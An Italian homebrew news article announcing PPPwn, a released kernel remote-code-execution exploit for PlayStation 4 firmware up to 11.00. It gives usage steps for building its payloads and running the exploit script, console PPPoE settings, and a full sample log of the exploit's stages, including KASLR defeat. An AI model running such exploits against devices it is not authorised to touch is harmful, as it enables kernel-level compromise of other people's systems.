Home Homebrew Rilasciato PPPwn – Kernel RCE per console PlayStation 4 compatibile fino...

[Scena PS4] Rilasciato PPPwn – Kernel RCE per console PlayStation 4 compatibile fino al firmware 11.00

763
0

Il developer TheFlow ha rilasciato in anticipo un nuovo exploit di esecuzione remota del codice kernel (RCE) chiamato PPPwn per le console PlayStation 4.

Questo exploit è un proof-of-concept applicabile a console con versioni del firmware fino alla versione 11.00. Originariamente previsto per essere presentato alla conferenza TyphoonCon24 a Seoul, TheFlow lo ha reso disponibile prima del previsto.

PPPwn sfrutta una vulnerabilità (CVE-2006-4304) che è stata segnalata responsabilmente a PlayStation. Supporta le versioni del firmware 9.00 e 11.00, e potenzialmente altre con contributi della comunità tramite richieste di pull.

L’exploit attualmente mostra solo un messaggio “PPPwned” sulla PlayStation come dimostrazione della sua capacità. Per utilizzare altri software homebrew come Mira, è necessaria un’ulteriore adattamento del payload stage2.bin.

Requisiti

  • Computer con porta Ethernet.
    • Funziona anche un adattatore USB.
  • Cavo Ethernet.
  • Linux.
    • Puoi utilizzare VirtualBox per creare una VM Linux con un Adattatore di Rete in modalità bridge per utilizzare la porta Ethernet nella VM.
  • Python3 e gcc installati.

Utilizzo

  1. Sul PC, clonare la repository:

git clone --recursive https://github.com/TheOfficialFloW/PPPwn

  1. Installare i requisiti:

sudo pip install -r requirements.txt

  1. Compilare i payload:

make -C stage1 FW=1100 clean && make -C stage1 FW=1100
make -C stage2 FW=1100 clean && make -C stage2 FW=1100

Per altri firmware, ad esempio il firmware 9.00, utilizzare invece FW=900.

  1. Eseguire l’exploit (vedi ifconfig per l’interfaccia corretta):

sudo python3 pppwn.py --interface=enp0s3 --fw=1100

Per altri firmware, ad esempio FW 9.00, utilizzare invece --fw=900.

Sulla console PlayStation 4

  • Andare a Impostazioni e poi Rete.
  • Selezionare Configura connessione Internet e scegliere Usa un cavo LAN.
  • Scegliere Configurazione personalizzata e selezionare PPPoE per le Impostazioni Indirizzo IP.
  • Inserire qualsiasi cosa per ID Utente PPPoE e Password PPPoE.
  • Scegliere Automatico per le Impostazioni DNS e Impostazioni MTU.
  • Scegliere Non usare per Server Proxy.
  • Cliccare su Test connessione Internet per comunicare con il proprio computer.

Se l’exploit fallisce o la PlayStation 4 si blocca, è possibile saltare la configurazione internet e cliccare semplicemente su Test connessione Internet.

Se lo script pppwn.py è bloccato in attesa di una richiesta/risposta, interromperlo e rieseguirlo sul PC, poi cliccare su Test connessione Internet sulla console PlayStation 4.

Se l’exploit funziona, dovreste vedere un output simile a quello sotto, e dovreste vedere “Impossibile connettersi alla rete” seguito da “PPPwned” stampato sulla console PS4.

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141

[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000

[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!

Download: Source code PPPwn – PlayStation 4 PPPoE RCE

Fonte: twitter.com

LASCIA UN COMMENTO

Per favore inserisci il tuo commento!
Per favore inserisci il tuo nome qui

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.